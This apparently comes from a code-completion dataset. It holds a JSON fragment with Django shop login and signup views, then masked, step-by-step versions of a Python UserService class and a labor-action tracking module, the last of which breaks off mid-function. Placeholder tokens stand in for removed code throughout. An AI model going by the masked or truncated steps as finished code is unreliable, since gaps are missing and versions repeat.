"step-5": "from typing import Dict, Any\nfrom urllib import request\n\nfrom django.shortcuts import render, get_object_or_404\nfrom django.urls import reverse\n\nfrom .models import Product\nfrom cart.forms import CartAddProductForm\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth import authenticate, login, logout\nfrom .forms import UserForm, UserLogInForm\nfrom django.views import generic\nfrom django.views.generic import View\n\n\ndef product_list(request):\n products = Product.objects.filter(available=True)\n\n context = {'products': products,\n 'user': request.user}\n return render(request, 'shop/product/list.html', context)\n\n\ndef product_detail(request, id, slug):\n product = get_object_or_404(Product, id=id, slug=slug, available=True)\n cart_product_form = CartAddProductForm()\n context = {'product': product,\n 'cart_product_form': cart_product_form}\n return render(request, 'shop/product/detail.html', context)\n\n\nclass UserFormView(View):\n form_class = UserForm\n template_name = 'shop/signup.html'\n\n # display blank form\n def get(self, request):\n form = self.form_class(None)\n return render(request, self.template_name, {'form': form})\n\n # process form data\n def post(self, request):\n form = self.form_class(request.POST)\n\n if form.is_valid():\n\n user = form.save(commit=False)\n\n username = form.cleaned_data['username']\n password = form.cleaned_data['password']\n user.set_password(password)\n user.save()\n\n user = authenticate(username=username, password=password)\n\n if user is not None:\n if user.is_active:\n login(request, user)\n #print(request.user.is_authenticated())\n return redirect('/shop/')\n\n return render(request, self.template_name, {'form': form})\n\n\ndef user_login(request):\n context = {\n 'form': UserLogInForm\n }\n if request.method == \"POST\":\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(request, username=username, password=password)\n if user:\n login(request, user)\n return redirect('/shop/')\n else:\n context['error'] = \"Provide valid credentials\"\n return render(request, 'shop/login.html', context)\n else:\n return render(request, 'shop/login.html', context)\n\n\ndef user_logout(request):\n if request.method == 'POST':\n logout(request)\n\n return render(request, \"shop/login.html\")\n\n\n\n\n\n\n",
"step-ids": [
4,
6,
8,
9,
10
]
}
|
[
4,
6,
8,
9,
10
] |
<|reserved_special_token_0|>
class UserService(object):
<|reserved_special_token_0|>
@staticmethod
def get(id):
"""获取单条记录
[description]
Arguments:
id int -- 主键
return:
User Model 实例 | None
"""
if not id:
raise JsonError('ID不能为空')
obj = User.Q.filter(User.id == id).first()
return obj
<|reserved_special_token_0|>
@staticmethod
def insert(param):
"""插入
[description]
Arguments:
id int -- 主键
param dict -- [description]
return:
True | JsonError
"""
columns = [i for i, _ in User.__table__.columns.items()]
param = {k: v for k, v in param.items() if k in columns}
if 'created_at' in columns:
param['created_at'] = utime.timestamp(3)
try:
obj = User(**param)
User.session.add(obj)
User.session.commit()
return True
except Exception as e:
User.session.rollback()
SysLogger.error(e)
raise JsonError('insert error')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class UserService(object):
<|reserved_special_token_0|>
@staticmethod
def get(id):
"""获取单条记录
[description]
Arguments:
id int -- 主键
return:
User Model 实例 | None
"""
if not id:
raise JsonError('ID不能为空')
obj = User.Q.filter(User.id == id).first()
return obj
@staticmethod
def update(id, param):
"""更新记录
[description]
Arguments:
id int -- 主键
param dict -- [description]
return:
True | JsonError
"""
columns = [i for i, _ in User.__table__.columns.items()]
param = {k: v for k, v in param.items() if k in columns}
if 'updated_at' in columns:
param['updated_at'] = utime.timestamp(3)
if not id:
raise JsonError('ID 不能为空')
try:
User.Update.filter(User.id == id).update(param)
User.session.commit()
return True
except Exception as e:
User.session.rollback()
SysLogger.error(e)
raise JsonError('update error')
@staticmethod
def insert(param):
"""插入
[description]
Arguments:
id int -- 主键
param dict -- [description]
return:
True | JsonError
"""
columns = [i for i, _ in User.__table__.columns.items()]
param = {k: v for k, v in param.items() if k in columns}
if 'created_at' in columns:
param['created_at'] = utime.timestamp(3)
try:
obj = User(**param)
User.session.add(obj)
User.session.commit()
return True
except Exception as e:
User.session.rollback()
SysLogger.error(e)
raise JsonError('insert error')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class UserService(object):
@staticmethod
def page_list(where, page, per_page):
"""列表记录
Arguments:
where dict -- 查询条件
page int -- 当前页
per_page int -- 每页记录数
return:
Paginate 对象 | None
"""
query = User.Q
if 'status' in where.keys():
query = query.filter(User.status == where['status'])
else:
query = query.filter(User.status != -1)
pagelist_obj = query.paginate(page=page, per_page=per_page)
return pagelist_obj
@staticmethod
def get(id):
"""获取单条记录
[description]
Arguments:
id int -- 主键
return:
User Model 实例 | None
"""
if not id:
raise JsonError('ID不能为空')
obj = User.Q.filter(User.id == id).first()
return obj
@staticmethod
def update(id, param):
"""更新记录
[description]
Arguments:
id int -- 主键
param dict -- [description]
return:
True | JsonError
"""
columns = [i for i, _ in User.__table__.columns.items()]
param = {k: v for k, v in param.items() if k in columns}
if 'updated_at' in columns:
param['updated_at'] = utime.timestamp(3)
if not id:
raise JsonError('ID 不能为空')
try:
User.Update.filter(User.id == id).update(param)
User.session.commit()
return True
except Exception as e:
User.session.rollback()
SysLogger.error(e)
raise JsonError('update error')
@staticmethod
def insert(param):
"""插入
[description]
Arguments:
id int -- 主键
param dict -- [description]
return:
True | JsonError
"""
columns = [i for i, _ in User.__table__.columns.items()]
param = {k: v for k, v in param.items() if k in columns}
if 'created_at' in columns:
param['created_at'] = utime.timestamp(3)
try:
obj = User(**param)
User.session.add(obj)
User.session.commit()
return True
except Exception as e:
User.session.rollback()
SysLogger.error(e)
raise JsonError('insert error')
<|reserved_special_token_1|>
from trest.utils import utime
from trest.logger import SysLogger
from trest.config import settings
from trest.exception import JsonError
from applications.common.models.user import User
class UserService(object):
@staticmethod
def page_list(where, page, per_page):
"""列表记录
Arguments:
where dict -- 查询条件
page int -- 当前页
per_page int -- 每页记录数
return:
Paginate 对象 | None
"""
query = User.Q
if 'status' in where.keys():
query = query.filter(User.status == where['status'])
else:
query = query.filter(User.status != -1)
pagelist_obj = query.paginate(page=page, per_page=per_page)
return pagelist_obj
@staticmethod
def get(id):
"""获取单条记录
[description]
Arguments:
id int -- 主键
return:
User Model 实例 | None
"""
if not id:
raise JsonError('ID不能为空')
obj = User.Q.filter(User.id == id).first()
return obj
@staticmethod
def update(id, param):
"""更新记录
[description]
Arguments:
id int -- 主键
param dict -- [description]
return:
True | JsonError
"""
columns = [i for i, _ in User.__table__.columns.items()]
param = {k: v for k, v in param.items() if k in columns}
if 'updated_at' in columns:
param['updated_at'] = utime.timestamp(3)
if not id:
raise JsonError('ID 不能为空')
try:
User.Update.filter(User.id == id).update(param)
User.session.commit()
return True
except Exception as e:
User.session.rollback()
SysLogger.error(e)
raise JsonError('update error')
@staticmethod
def insert(param):
"""插入
[description]
Arguments:
id int -- 主键
param dict -- [description]
return:
True | JsonError
"""
columns = [i for i, _ in User.__table__.columns.items()]
param = {k: v for k, v in param.items() if k in columns}
if 'created_at' in columns:
param['created_at'] = utime.timestamp(3)
try:
obj = User(**param)
User.session.add(obj)
User.session.commit()
return True
except Exception as e:
User.session.rollback()
SysLogger.error(e)
raise JsonError('insert error')
<|reserved_special_token_1|>
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from trest.utils import utime
from trest.logger import SysLogger
from trest.config import settings
from trest.exception import JsonError
from applications.common.models.user import User
class UserService(object):
@staticmethod
def page_list(where, page, per_page):
"""列表记录
Arguments:
where dict -- 查询条件
page int -- 当前页
per_page int -- 每页记录数
return:
Paginate 对象 | None
"""
query = User.Q
if 'status' in where.keys():
query = query.filter(User.status == where['status'])
else:
query = query.filter(User.status != -1)
pagelist_obj = query.paginate(page=page, per_page=per_page)
return pagelist_obj
@staticmethod
def get(id):
"""获取单条记录
[description]
Arguments:
id int -- 主键
return:
User Model 实例 | None
"""
if not id:
raise JsonError('ID不能为空')
obj = User.Q.filter(User.id == id).first()
return obj
@staticmethod
def update(id, param):
"""更新记录
[description]
Arguments:
id int -- 主键
param dict -- [description]
return:
True | JsonError
"""
columns = [i for (i, _) in User.__table__.columns.items()]
param = {k:v for k,v in param.items() if k in columns}
if 'updated_at' in columns:
param['updated_at'] = utime.timestamp(3)
if not id:
raise JsonError('ID 不能为空')
try:
User.Update.filter(User.id == id).update(param)
User.session.commit()
return True
except Exception as e:
User.session.rollback()
SysLogger.error(e)
raise JsonError('update error')
@staticmethod
def insert(param):
"""插入
[description]
Arguments:
id int -- 主键
param dict -- [description]
return:
True | JsonError
"""
columns = [i for (i, _) in User.__table__.columns.items()]
param = {k:v for k,v in param.items() if k in columns}
if 'created_at' in columns:
param['created_at'] = utime.timestamp(3)
try:
obj = User(**param)
User.session.add(obj)
User.session.commit()
return True
except Exception as e:
User.session.rollback()
SysLogger.error(e)
raise JsonError('insert error')
|
flexible
|
{
"blob_id": "d1ed43bab6171c876b2ad9ef9db834ab8f9026d5",
"index": 8411,
"step-1": "<mask token>\n\n\nclass UserService(object):\n <mask token>\n\n @staticmethod\n def get(id):\n \"\"\"获取单条记录\n\n [description]\n\n Arguments:\n id int -- 主键\n\n return:\n User Model 实例 | None\n \"\"\"\n if not id:\n raise JsonError('ID不能为空')\n obj = User.Q.filter(User.id == id).first()\n return obj\n <mask token>\n\n @staticmethod\n def insert(param):\n \"\"\"插入\n\n [description]\n\n Arguments:\n id int -- 主键\n param dict -- [description]\n\n return:\n True | JsonError\n \"\"\"\n columns = [i for i, _ in User.__table__.columns.items()]\n param = {k: v for k, v in param.items() if k in columns}\n if 'created_at' in columns:\n param['created_at'] = utime.timestamp(3)\n try:\n obj = User(**param)\n User.session.add(obj)\n User.session.commit()\n return True\n except Exception as e:\n User.session.rollback()\n SysLogger.error(e)\n raise JsonError('insert error')\n",
"step-2": "<mask token>\n\n\nclass UserService(object):\n <mask token>\n\n @staticmethod\n def get(id):\n \"\"\"获取单条记录\n\n [description]\n\n Arguments:\n id int -- 主键\n\n return:\n User Model 实例 | None\n \"\"\"\n if not id:\n raise JsonError('ID不能为空')\n obj = User.Q.filter(User.id == id).first()\n return obj\n\n @staticmethod\n def update(id, param):\n \"\"\"更新记录\n\n [description]\n\n Arguments:\n id int -- 主键\n param dict -- [description]\n\n return:\n True | JsonError\n \"\"\"\n columns = [i for i, _ in User.__table__.columns.items()]\n param = {k: v for k, v in param.items() if k in columns}\n if 'updated_at' in columns:\n param['updated_at'] = utime.timestamp(3)\n if not id:\n raise JsonError('ID 不能为空')\n try:\n User.Update.filter(User.id == id).update(param)\n User.session.commit()\n return True\n except Exception as e:\n User.session.rollback()\n SysLogger.error(e)\n raise JsonError('update error')\n\n @staticmethod\n def insert(param):\n \"\"\"插入\n\n [description]\n\n Arguments:\n id int -- 主键\n param dict -- [description]\n\n return:\n True | JsonError\n \"\"\"\n columns = [i for i, _ in User.__table__.columns.items()]\n param = {k: v for k, v in param.items() if k in columns}\n if 'created_at' in columns:\n param['created_at'] = utime.timestamp(3)\n try:\n obj = User(**param)\n User.session.add(obj)\n User.session.commit()\n return True\n except Exception as e:\n User.session.rollback()\n SysLogger.error(e)\n raise JsonError('insert error')\n",
"step-3": "<mask token>\n\n\nclass UserService(object):\n\n @staticmethod\n def page_list(where, page, per_page):\n \"\"\"列表记录\n Arguments:\n where dict -- 查询条件\n page int -- 当前页\n per_page int -- 每页记录数\n\n return:\n Paginate 对象 | None\n \"\"\"\n query = User.Q\n if 'status' in where.keys():\n query = query.filter(User.status == where['status'])\n else:\n query = query.filter(User.status != -1)\n pagelist_obj = query.paginate(page=page, per_page=per_page)\n return pagelist_obj\n\n @staticmethod\n def get(id):\n \"\"\"获取单条记录\n\n [description]\n\n Arguments:\n id int -- 主键\n\n return:\n User Model 实例 | None\n \"\"\"\n if not id:\n raise JsonError('ID不能为空')\n obj = User.Q.filter(User.id == id).first()\n return obj\n\n @staticmethod\n def update(id, param):\n \"\"\"更新记录\n\n [description]\n\n Arguments:\n id int -- 主键\n param dict -- [description]\n\n return:\n True | JsonError\n \"\"\"\n columns = [i for i, _ in User.__table__.columns.items()]\n param = {k: v for k, v in param.items() if k in columns}\n if 'updated_at' in columns:\n param['updated_at'] = utime.timestamp(3)\n if not id:\n raise JsonError('ID 不能为空')\n try:\n User.Update.filter(User.id == id).update(param)\n User.session.commit()\n return True\n except Exception as e:\n User.session.rollback()\n SysLogger.error(e)\n raise JsonError('update error')\n\n @staticmethod\n def insert(param):\n \"\"\"插入\n\n [description]\n\n Arguments:\n id int -- 主键\n param dict -- [description]\n\n return:\n True | JsonError\n \"\"\"\n columns = [i for i, _ in User.__table__.columns.items()]\n param = {k: v for k, v in param.items() if k in columns}\n if 'created_at' in columns:\n param['created_at'] = utime.timestamp(3)\n try:\n obj = User(**param)\n User.session.add(obj)\n User.session.commit()\n return True\n except Exception as e:\n User.session.rollback()\n SysLogger.error(e)\n raise JsonError('insert error')\n",
"step-4": "from trest.utils import utime\nfrom trest.logger import SysLogger\nfrom trest.config import settings\nfrom trest.exception import JsonError\nfrom applications.common.models.user import User\n\n\nclass UserService(object):\n\n @staticmethod\n def page_list(where, page, per_page):\n \"\"\"列表记录\n Arguments:\n where dict -- 查询条件\n page int -- 当前页\n per_page int -- 每页记录数\n\n return:\n Paginate 对象 | None\n \"\"\"\n query = User.Q\n if 'status' in where.keys():\n query = query.filter(User.status == where['status'])\n else:\n query = query.filter(User.status != -1)\n pagelist_obj = query.paginate(page=page, per_page=per_page)\n return pagelist_obj\n\n @staticmethod\n def get(id):\n \"\"\"获取单条记录\n\n [description]\n\n Arguments:\n id int -- 主键\n\n return:\n User Model 实例 | None\n \"\"\"\n if not id:\n raise JsonError('ID不能为空')\n obj = User.Q.filter(User.id == id).first()\n return obj\n\n @staticmethod\n def update(id, param):\n \"\"\"更新记录\n\n [description]\n\n Arguments:\n id int -- 主键\n param dict -- [description]\n\n return:\n True | JsonError\n \"\"\"\n columns = [i for i, _ in User.__table__.columns.items()]\n param = {k: v for k, v in param.items() if k in columns}\n if 'updated_at' in columns:\n param['updated_at'] = utime.timestamp(3)\n if not id:\n raise JsonError('ID 不能为空')\n try:\n User.Update.filter(User.id == id).update(param)\n User.session.commit()\n return True\n except Exception as e:\n User.session.rollback()\n SysLogger.error(e)\n raise JsonError('update error')\n\n @staticmethod\n def insert(param):\n \"\"\"插入\n\n [description]\n\n Arguments:\n id int -- 主键\n param dict -- [description]\n\n return:\n True | JsonError\n \"\"\"\n columns = [i for i, _ in User.__table__.columns.items()]\n param = {k: v for k, v in param.items() if k in columns}\n if 'created_at' in columns:\n param['created_at'] = utime.timestamp(3)\n try:\n obj = User(**param)\n User.session.add(obj)\n User.session.commit()\n return True\n except Exception as e:\n User.session.rollback()\n SysLogger.error(e)\n raise JsonError('insert error')\n",
"step-5": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom trest.utils import utime\nfrom trest.logger import SysLogger\nfrom trest.config import settings\nfrom trest.exception import JsonError\nfrom applications.common.models.user import User\n\n\nclass UserService(object):\n @staticmethod\n def page_list(where, page, per_page):\n \"\"\"列表记录\n Arguments:\n where dict -- 查询条件\n page int -- 当前页\n per_page int -- 每页记录数\n\n return:\n Paginate 对象 | None\n \"\"\"\n query = User.Q\n\n if 'status' in where.keys():\n query = query.filter(User.status == where['status'])\n else:\n query = query.filter(User.status != -1)\n\n pagelist_obj = query.paginate(page=page, per_page=per_page)\n return pagelist_obj\n\n @staticmethod\n def get(id):\n \"\"\"获取单条记录\n\n [description]\n\n Arguments:\n id int -- 主键\n\n return:\n User Model 实例 | None\n \"\"\"\n if not id:\n raise JsonError('ID不能为空')\n obj = User.Q.filter(User.id == id).first()\n return obj\n\n @staticmethod\n def update(id, param):\n \"\"\"更新记录\n\n [description]\n\n Arguments:\n id int -- 主键\n param dict -- [description]\n\n return:\n True | JsonError\n \"\"\"\n columns = [i for (i, _) in User.__table__.columns.items()]\n param = {k:v for k,v in param.items() if k in columns}\n if 'updated_at' in columns:\n param['updated_at'] = utime.timestamp(3)\n\n if not id:\n raise JsonError('ID 不能为空')\n\n try:\n User.Update.filter(User.id == id).update(param)\n User.session.commit()\n return True\n except Exception as e:\n User.session.rollback()\n SysLogger.error(e)\n raise JsonError('update error')\n\n @staticmethod\n def insert(param):\n \"\"\"插入\n\n [description]\n\n Arguments:\n id int -- 主键\n param dict -- [description]\n\n return:\n True | JsonError\n \"\"\"\n columns = [i for (i, _) in User.__table__.columns.items()]\n param = {k:v for k,v in param.items() if k in columns}\n if 'created_at' in columns:\n param['created_at'] = utime.timestamp(3)\n try:\n obj = User(**param)\n User.session.add(obj)\n User.session.commit()\n return True\n except Exception as e:\n User.session.rollback()\n SysLogger.error(e)\n raise JsonError('insert error')\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
@dataclass
class Actions:
""" The class for a set of actions.
This class is a collection of actions. It is used to for the four primary
usecases:
- to serialize the list of actions into a dataframe
- to serialize the list of actions into a markdown/html table
- to create and populate an Actions instance from a dataframe
- to create and populate an Actions instance from a markdown document
"""
action_id: ClassVar = 'actions'
actions: List[Action] = field(default_factory=lambda : [])
fields: List[str] = field(default_factory=lambda : [key for key, value in
Action.__dataclass_fields__.items() if value.type != ClassVar])
def __len__(self) ->int:
""" Get the number of actions. """
return len(self.actions)
def __eq__(self, other):
""" Overrides the default implementation for equality. """
if isinstance(other, Actions):
return self.actions == other.actions
return False
def sort(self, *args, **kwargs) ->'Actions':
""" Sorts the list of actions. """
self.actions.sort(*args, **kwargs)
return self
def append(self, action: Action):
""" Append an action onto this instance of Actions. """
self.actions.append(action)
def to_df(self) ->pd.DataFrame:
""" Converts this instance of Actions to a df. """
data = []
for action in self.actions:
data.append(action.to_df())
df = pd.read_json(json.dumps(data), orient='list')
return df[self.fields]
def to_md(self):
""" Convert this instance of Actions to markdown/HTML. """
soup = BeautifulSoup(f'<div id={self.action_id}></div>', 'html.parser')
for action in self.actions:
table = soup.new_tag('table')
soup.div.append(table)
for meta_field in Action._meta_fields:
table[meta_field] = action.__getattribute__(meta_field)
for field in self.fields:
if action.__getattribute__(field) is None:
continue
if field in Action._meta_fields:
continue
tr = soup.new_tag('tr')
td_key = soup.new_tag('td', attrs={'class': 'field-key'})
td_val = soup.new_tag('td', attrs={'class': 'field-value'})
td_key.string = field
td_val = action.to_md(field, td_val)
tr.append(td_key)
tr.append(td_val)
table.append(tr)
return soup.prettify()
@classmethod
def read_from_md(cls, md_doc: MarkdownDocument) ->'Actions':
""" Create and populate an Actions instance from a Markdown Document. """
md_data = re.findall(f'<div id="{cls.action_id}">+[\\s\\S]+<\\/div>',
md_doc)
assert len(md_data
) == 1, f'multiple divs with id={cls.action_id} were found'
md_data = md_data[0]
soup = BeautifulSoup(md_data, 'html.parser')
tables = soup.div.find_all('table')
actions = Actions()
for table in tables:
action = Action.create_from_md(table)
actions.append(action)
return actions
@staticmethod
def read_from_df(df: pd.DataFrame) ->'Actions':
""" Create and populate an Actions instance from a dataframe. """
actions = Actions()
for i, row in df.iterrows():
action = Action.create_from_row(row)
actions.append(action)
return actions
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@dataclass
class Action:
<|reserved_special_token_0|>
date: str
sources: List[Url]
action: str
struggles: List[str]
description: str
locations: List[str] = None
companies: List[str] = None
workers: int = None
tags: List[str] = None
author: str = None
_meta_fields: ClassVar = ['author']
_valid_struggles: ClassVar = ['ethics', 'pay_and_benefits',
'working_conditions', 'discrimination', 'unfair_labor_practices',
'job_security']
_valid_actions: ClassVar = ['strike', 'protest', 'open_letter',
'legal_action', 'union_drive', 'union_representation']
@staticmethod
def is_none(field: Any) ->bool:
if field is None:
return True
elif isinstance(field, float) and math.isnan(field):
return True
elif isinstance(field, str) and field.lower() == 'none':
return True
elif isinstance(field, (list,)) and len(field) == 0:
return True
else:
return False
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def to_md(self, field: str, td: bs4.element.Tag) ->str:
""" Convert field for markdown
Takes a td BeautifulSoup object and updates it according to the field
type so that it renders correctly in markdown.
"""
assert field in self.__dataclass_fields__, f'Cannot serialize {field}. Not a valid field in Action.'
value = self.__getattribute__(field)
if field in ['date', 'workers']:
td.string = str(value)
elif field in ['locations', 'struggles', 'companies', 'tags']:
td.string = str(value).strip('[').strip(']').replace("'", ''
).replace('"', '')
elif field == 'sources':
ret = []
for source in value:
tag = (
f"<a href='{source}' target='_blank'>{urlparse(source).netloc}</a>"
)
ret.append(tag)
td.append(BeautifulSoup(html.unescape(', '.join(ret)),
'html.parser'))
else:
td.string = value
return td
<|reserved_special_token_0|>
<|reserved_special_token_0|>
@dataclass
class Actions:
""" The class for a set of actions.
This class is a collection of actions. It is used to for the four primary
usecases:
- to serialize the list of actions into a dataframe
- to serialize the list of actions into a markdown/html table
- to create and populate an Actions instance from a dataframe
- to create and populate an Actions instance from a markdown document
"""
action_id: ClassVar = 'actions'
actions: List[Action] = field(default_factory=lambda : [])
fields: List[str] = field(default_factory=lambda : [key for key, value in
Action.__dataclass_fields__.items() if value.type != ClassVar])
def __len__(self) ->int:
""" Get the number of actions. """
return len(self.actions)
def __eq__(self, other):
""" Overrides the default implementation for equality. """
if isinstance(other, Actions):
return self.actions == other.actions
return False
def sort(self, *args, **kwargs) ->'Actions':
""" Sorts the list of actions. """
self.actions.sort(*args, **kwargs)
return self
def append(self, action: Action):
""" Append an action onto this instance of Actions. """
self.actions.append(action)
def to_df(self) ->pd.DataFrame:
""" Converts this instance of Actions to a df. """
data = []
for action in self.actions:
data.append(action.to_df())
df = pd.read_json(json.dumps(data), orient='list')
return df[self.fields]
def to_md(self):
""" Convert this instance of Actions to markdown/HTML. """
soup = BeautifulSoup(f'<div id={self.action_id}></div>', 'html.parser')
for action in self.actions:
table = soup.new_tag('table')
soup.div.append(table)
for meta_field in Action._meta_fields:
table[meta_field] = action.__getattribute__(meta_field)
for field in self.fields:
if action.__getattribute__(field) is None:
continue
if field in Action._meta_fields:
continue
tr = soup.new_tag('tr')
td_key = soup.new_tag('td', attrs={'class': 'field-key'})
td_val = soup.new_tag('td', attrs={'class': 'field-value'})
td_key.string = field
td_val = action.to_md(field, td_val)
tr.append(td_key)
tr.append(td_val)
table.append(tr)
return soup.prettify()
@classmethod
def read_from_md(cls, md_doc: MarkdownDocument) ->'Actions':
""" Create and populate an Actions instance from a Markdown Document. """
md_data = re.findall(f'<div id="{cls.action_id}">+[\\s\\S]+<\\/div>',
md_doc)
assert len(md_data
) == 1, f'multiple divs with id={cls.action_id} were found'
md_data = md_data[0]
soup = BeautifulSoup(md_data, 'html.parser')
tables = soup.div.find_all('table')
actions = Actions()
for table in tables:
action = Action.create_from_md(table)
actions.append(action)
return actions
@staticmethod
def read_from_df(df: pd.DataFrame) ->'Actions':
""" Create and populate an Actions instance from a dataframe. """
actions = Actions()
for i, row in df.iterrows():
action = Action.create_from_row(row)
actions.append(action)
return actions
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@dataclass
class Action:
<|reserved_special_token_0|>
date: str
sources: List[Url]
action: str
struggles: List[str]
description: str
locations: List[str] = None
companies: List[str] = None
workers: int = None
tags: List[str] = None
author: str = None
_meta_fields: ClassVar = ['author']
_valid_struggles: ClassVar = ['ethics', 'pay_and_benefits',
'working_conditions', 'discrimination', 'unfair_labor_practices',
'job_security']
_valid_actions: ClassVar = ['strike', 'protest', 'open_letter',
'legal_action', 'union_drive', 'union_representation']
@staticmethod
def is_none(field: Any) ->bool:
if field is None:
return True
elif isinstance(field, float) and math.isnan(field):
return True
elif isinstance(field, str) and field.lower() == 'none':
return True
elif isinstance(field, (list,)) and len(field) == 0:
return True
else:
return False
<|reserved_special_token_0|>
def __post_init__(self):
""" Used to validate fields. """
self.date = dateparser.parse(self.date).date()
self.sources = self.listify(self.sources)
self.struggles = self.listify(self.struggles)
self.action = self.action.strip().lower()
self.companies = self.listify(self.companies)
self.tags = self.listify(self.tags)
self.locations = self.listify(self.locations)
self.workers = None if self.is_none(self.workers) else int(self.workers
)
assert self.action in self._valid_actions, f"'{self.action}' is not a valid input. Valid inputs are: {self._valid_actions}"
for struggle in self.struggles:
assert struggle in self._valid_struggles, f"'{struggle}' is not a valid input. Valid inputs are: {self._valid_struggles}"
for source in self.sources:
assert BeautifulSoup(source, 'html.parser'
).a is not None or urlparse(source
).netloc is not '', f"'{source}' is in valid. source must be a valid url or an html link tag element"
self.sources = [(BeautifulSoup(source, 'html.parser').a['href'] if
'href' in source else source) for source in self.sources]
def __lt__(self, other):
""" Used to make Actions sortable. """
return self.date < other.date
def __eq__(self, other):
""" Overrides the default implementation for equality. """
if isinstance(other, Action):
return self.__dict__.items() == other.__dict__.items()
return False
def to_df(self) ->Dict[str, Any]:
""" Return dict of all fields serialized to string """
return {key: self.render_df(key) for key, value in self.__dict__.
items()}
def render_df(self, field: str) ->str:
""" Return the value of the field rendered for df. """
value = self.__getattribute__(field)
if field in ['date', 'workers']:
return str(value)
elif field in ['locations', 'struggles', 'companies', 'tags', 'sources'
]:
return str(value).strip('[').strip(']').replace("'", '').replace(
'"', '')
else:
return value
def to_md(self, field: str, td: bs4.element.Tag) ->str:
""" Convert field for markdown
Takes a td BeautifulSoup object and updates it according to the field
type so that it renders correctly in markdown.
"""
assert field in self.__dataclass_fields__, f'Cannot serialize {field}. Not a valid field in Action.'
value = self.__getattribute__(field)
if field in ['date', 'workers']:
td.string = str(value)
elif field in ['locations', 'struggles', 'companies', 'tags']:
td.string = str(value).strip('[').strip(']').replace("'", ''
).replace('"', '')
elif field == 'sources':
ret = []
for source in value:
tag = (
f"<a href='{source}' target='_blank'>{urlparse(source).netloc}</a>"
)
ret.append(tag)
td.append(BeautifulSoup(html.unescape(', '.join(ret)),
'html.parser'))
else:
td.string = value
return td
<|reserved_special_token_0|>
@classmethod
def create_from_row(cls, row: pd.Series) ->'Action':
""" Create an Action instance from a dataframe row. """
fields = [key for key, value in cls.__dataclass_fields__.items() if
value.type != ClassVar]
d = {key: value for key, value in row.to_dict().items() if key in
fields}
return cls(**d)
@dataclass
class Actions:
""" The class for a set of actions.
This class is a collection of actions. It is used to for the four primary
usecases:
- to serialize the list of actions into a dataframe
- to serialize the list of actions into a markdown/html table
- to create and populate an Actions instance from a dataframe
- to create and populate an Actions instance from a markdown document
"""
action_id: ClassVar = 'actions'
actions: List[Action] = field(default_factory=lambda : [])
fields: List[str] = field(default_factory=lambda : [key for key, value in
Action.__dataclass_fields__.items() if value.type != ClassVar])
def __len__(self) ->int:
""" Get the number of actions. """
return len(self.actions)
def __eq__(self, other):
""" Overrides the default implementation for equality. """
if isinstance(other, Actions):
return self.actions == other.actions
return False
def sort(self, *args, **kwargs) ->'Actions':
""" Sorts the list of actions. """
self.actions.sort(*args, **kwargs)
return self
def append(self, action: Action):
""" Append an action onto this instance of Actions. """
self.actions.append(action)
def to_df(self) ->pd.DataFrame:
""" Converts this instance of Actions to a df. """
data = []
for action in self.actions:
data.append(action.to_df())
df = pd.read_json(json.dumps(data), orient='list')
return df[self.fields]
def to_md(self):
""" Convert this instance of Actions to markdown/HTML. """
soup = BeautifulSoup(f'<div id={self.action_id}></div>', 'html.parser')
for action in self.actions:
table = soup.new_tag('table')
soup.div.append(table)
for meta_field in Action._meta_fields:
table[meta_field] = action.__getattribute__(meta_field)
for field in self.fields:
if action.__getattribute__(field) is None:
continue
if field in Action._meta_fields:
continue
tr = soup.new_tag('tr')
td_key = soup.new_tag('td', attrs={'class': 'field-key'})
td_val = soup.new_tag('td', attrs={'class': 'field-value'})
td_key.string = field
td_val = action.to_md(field, td_val)
tr.append(td_key)
tr.append(td_val)
table.append(tr)
return soup.prettify()
@classmethod
def read_from_md(cls, md_doc: MarkdownDocument) ->'Actions':
""" Create and populate an Actions instance from a Markdown Document. """
md_data = re.findall(f'<div id="{cls.action_id}">+[\\s\\S]+<\\/div>',
md_doc)
assert len(md_data
) == 1, f'multiple divs with id={cls.action_id} were found'
md_data = md_data[0]
soup = BeautifulSoup(md_data, 'html.parser')
tables = soup.div.find_all('table')
actions = Actions()
for table in tables:
action = Action.create_from_md(table)
actions.append(action)
return actions
@staticmethod
def read_from_df(df: pd.DataFrame) ->'Actions':
""" Create and populate an Actions instance from a dataframe. """
actions = Actions()
for i, row in df.iterrows():
action = Action.create_from_row(row)
actions.append(action)
return actions
<|reserved_special_token_1|>
<|reserved_special_token_0|>
Url = str
@dataclass
class Action:
""" The class for an action we want to track.
This class is used to manage the data of an individual Action. It is used
to perform the following:
- set mandatory/optional fields
- set meta fields
- cast an validate data so that it knows how to read datafields from
markdown and dataframes
- output actions as for dataframes and markdown
- create and populate action instances from markdown and dataframes
"""
date: str
sources: List[Url]
action: str
struggles: List[str]
description: str
locations: List[str] = None
companies: List[str] = None
workers: int = None
tags: List[str] = None
author: str = None
_meta_fields: ClassVar = ['author']
_valid_struggles: ClassVar = ['ethics', 'pay_and_benefits',
'working_conditions', 'discrimination', 'unfair_labor_practices',
'job_security']
_valid_actions: ClassVar = ['strike', 'protest', 'open_letter',
'legal_action', 'union_drive', 'union_representation']
@staticmethod
def is_none(field: Any) ->bool:
if field is None:
return True
elif isinstance(field, float) and math.isnan(field):
return True
elif isinstance(field, str) and field.lower() == 'none':
return True
elif isinstance(field, (list,)) and len(field) == 0:
return True
else:
return False
def listify(self, field: Union[List[Any], Any]) ->List[Any]:
if self.is_none(field):
return None
elif isinstance(field, (list,)):
return field
else:
return [s.strip().lower() for s in field.split(',')]
def __post_init__(self):
""" Used to validate fields. """
self.date = dateparser.parse(self.date).date()
self.sources = self.listify(self.sources)
self.struggles = self.listify(self.struggles)
self.action = self.action.strip().lower()
self.companies = self.listify(self.companies)
self.tags = self.listify(self.tags)
self.locations = self.listify(self.locations)
self.workers = None if self.is_none(self.workers) else int(self.workers
)
assert self.action in self._valid_actions, f"'{self.action}' is not a valid input. Valid inputs are: {self._valid_actions}"
for struggle in self.struggles:
